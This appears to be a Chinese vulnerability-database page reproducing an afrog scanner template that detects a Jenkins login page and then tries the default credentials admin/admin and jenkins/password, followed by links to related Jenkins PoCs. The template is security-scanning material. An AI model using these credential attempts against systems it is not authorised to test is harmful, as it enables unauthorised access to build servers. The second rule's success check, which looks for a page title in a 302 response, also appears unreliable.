jenkins-default-pwd: Jenkins Default Password

日期: 2025-09-01 | 影响软件: Jenkins | POC: 已公开

漏洞描述

app="Jenkins"

PoC代码[已公开]

id: jenkins-default-pwd

info:
  name: Jenkins Default Password
  author: zan8in
  severity: high
  verified: true
  description: app="Jenkins"

rules:
    r0:
        request:
            method: GET
            path: /login
        expression: |
          response.status == 200 && response.body.bcontains(b'Sign in [Jenkins]')
        stop_if_mismatch: true
    r1:
        request:
            method: POST
            path: /j_spring_security_check
            body: |
              j_username=admin&j_password=admin&from=&Submit=Sign+in
        expression: |
          response.status == 302 && !response.headers["location"].contains("loginError")
        stop_if_match: true
    r2:
        request:
            method: POST
            path: /j_spring_security_check
            body: |
              j_username=jenkins&j_password=password&from=&Submit=Sign+in
        expression: |
          response.status == 302 && response.body.bcontains(b'<title>工作台 [Jenkins]</title>')
        stop_if_match: true
expression: r0() && (r1() || r2())

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/default-pwd/jenkins-default-pwd.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2018-1000861: Jenkins 2.138 Remote Command Execution POC

jenkins-api-panel: Jenkins API Instance Detection Template POC

jenkins-login: Jenkins Login Detected POC

CVE-2022-36883: Git Plugin up to 4.11.3 on Jenkins Build Authorization POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC